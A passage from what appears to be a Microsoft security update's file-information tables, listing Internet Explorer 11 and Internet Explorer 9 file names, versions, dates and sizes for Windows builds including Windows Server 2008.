\nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 292,864 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 288,768 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 286,208 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 281,600 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 286,720 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 292,352 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 242,176 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 243,200 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 46,080 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 51,712 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 54,272 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 45,056 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 39,936 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 39,424 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 51,200 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 35,328 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 11,264 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 9,216 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 6,656 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 4,388,352 \njsproxy.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 47,104 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 114,176 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 124,928 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 122,880 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 130,048 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 138,240 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 114,688 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 131,584 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 117,760 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 122,368 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 134,144 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 107,008 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 127,488 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 128,512 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 88,576 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 82,944 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 120,320 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 125,952 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 128,000 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 124,416 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 121,856 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 115,712 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 72,704 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 73,728 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 73,728 \niedkcs32.dll| 18.0.9600.19963| 13-Feb-2021| 11:46| 341,896 \ninstall.ins| Not versioned| 12-Feb-2021| 16:25| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2018| 6:18| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 710,656 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 2,048 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 12-Feb-2021| 16:34| 1,574 \nmsfeedsbs.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 52,736 \nmsfeedssync.exe| 11.0.9600.19963| 12-Feb-2021| 18:48| 11,776 \nhtml.iec| 2019.0.0.19963| 12-Feb-2021| 18:46| 341,504 \nielowutil.exe| 11.0.9600.19963| 12-Feb-2021| 18:39| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.19963| 12-Feb-2021| 17:51| 290,304 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 64,000 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:18| 1,075,200 \nmsrating.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2018| 6:27| 8,798 \nticrf.rat| Not versioned| 23-Sep-2018| 6:27| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 2,308,096 \nsqmapi.dll| 6.2.9200.16384| 13-Feb-2021| 11:46| 228,232 \ninseng.dll| 11.0.9600.19963| 12-Feb-2021| 18:24| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 2,066,432 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,121,216 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,075,136 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 2,063,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,314,240 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 2,390,528 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 2,033,152 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,255,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,061,312 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 2,326,016 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,019,840 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 2,071,040 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,082,816 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,170,368 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 2,153,984 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,291,712 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 2,283,520 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 2,052,096 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,301,952 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,093,056 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 2,075,648 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,299,392 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 2,094,592 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,316,800 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,305,536 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,277,888 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 2,060,288 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 2,315,776 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,324,992 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 2,098,176 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 3,072 \nieinstal.exe| 11.0.9600.19963| 12-Feb-2021| 18:20| 475,648 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 29,184 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 35,328 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 37,888 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 27,648 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 33,792 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 23,040 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 22,016 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 31,232 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 35,840 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 34,816 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 32,256 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 30,720 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 16,384 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 16,896 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 16,896 \n \n### **Windows Server 2008**\n\n## \n\n__\n\nInternet Explorer 9 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21532| 13-Feb-2021| 11:38| 1,141,248 \niexplore.exe| 9.0.8112.21532| 13-Feb-2021| 11:48| 751,544 \ninetcpl.cpl| 9.0.8112.21532| 13-Feb-2021| 11:36| 1,427,968 \nwininet.dll| 9.0.8112.21532| 13-Feb-2021| 11:37| 1,132,032 \njsproxy.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 75,776 \nWininetPlugin.dll| 1.0.0.1| 13-Feb-2021| 11:36| 66,048 \ntdc.ocx| 9.0.8112.21532| 13-Feb-2021| 11:35| 63,488 \niedvtool.dll| 9.0.8112.21532| 13-Feb-2021| 11:37| 678,912 \ndxtmsft.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 354,304 \ndxtrans.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 223,744 \nmsfeeds.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 607,744 \nmsfeeds.mof| Not versioned| 13-Feb-2021| 11:11| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Feb-2021| 11:11| 1,574 \nmsfeedsbs.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 41,472 \nmsfeedssync.exe| 9.0.8112.21532| 13-Feb-2021| 11:35| 10,752 \nmshta.exe| 9.0.8112.21532| 13-Feb-2021| 11:35| 11,776 \nhtml.iec| 2019.0.0.21527| 13-Feb-2021| 11:40| 367,616 \nmshtmled.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 72,704 \nmshtml.dll| 9.0.8112.21532| 13-Feb-2021| 11:45| 12,844,544 \nmshtml.tlb| 9.0.8112.21532| 13-Feb-2021| 11:35| 2,382,848 \nielowutil.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 223,232 \nieproxy.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 195,072 \nIEShims.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 194,560 \nExtExport.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 22,528 \nWindows Pop-up Blocked.wav| Not versioned| 27-Apr-2018| 10:11| 85,548 \nWindows Information Bar.wav| Not versioned| 27-Apr-2018| 10:11| 23,308 \nWindows Feed Discovered.wav| Not versioned| 27-Apr-2018| 10:11| 19,884 \nWindows Navigation Start.wav| Not versioned| 27-Apr-2018| 10:11| 11,340 \nieUnatt.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 142,848 \njsdbgui.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 388,096 \niertutil.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 13-Feb-2021| 11:48| 142,776 \nVGX.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 769,024 \nurl.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 231,936 \nieframe.dll| 9.0.8112.21532| 13-Feb-2021| 11:39| 9,757,696 \nieui.dll| 9.0.8112.21532| 13-Feb-2021| 11:34| 176,640 \nieinstal.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 474,624 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:53| 393,813 \ninetres.admx| Not versioned| 27-Apr-2018| 10:14| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 104,448 \njscript.dll| 5.8.7601.21527| 13-Feb-2021| 11:36| 723,456 \njscript9.dll| 9.0.8112.21532| 13-Feb-2021| 11:43| 1,819,648 \nvbscript.dll| 5.8.7601.21527| 13-Feb-2021| 11:36| 434,176 \n \n## \n\n__\n\nInternet Explorer 9 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21532| 13-Feb-2021| 12:30| 1,390,592 \niexplore.exe| 9.0.8112.21532| 13-Feb-2021| 12:52| 757,688 \ninetcpl.cpl| 9.0.8112.21532| 13-Feb-2021| 12:28| 1,494,528 \nwininet.dll| 9.0.8112.21532| 13-Feb-2021| 12:30| 1,394,688 \njsproxy.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 97,280 \nWininetPlugin.dll| 1.0.0.1| 13-Feb-2021| 12:28| 86,528 \ntdc.ocx| 9.0.8112.21532| 13-Feb-2021| 12:27| 76,800 \niedvtool.dll| 9.0.8112.21532| 13-Feb-2021| 12:29| 887,808 \ndxtmsft.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 452,608 \ndxtrans.dll| 9.0.8112.21532| 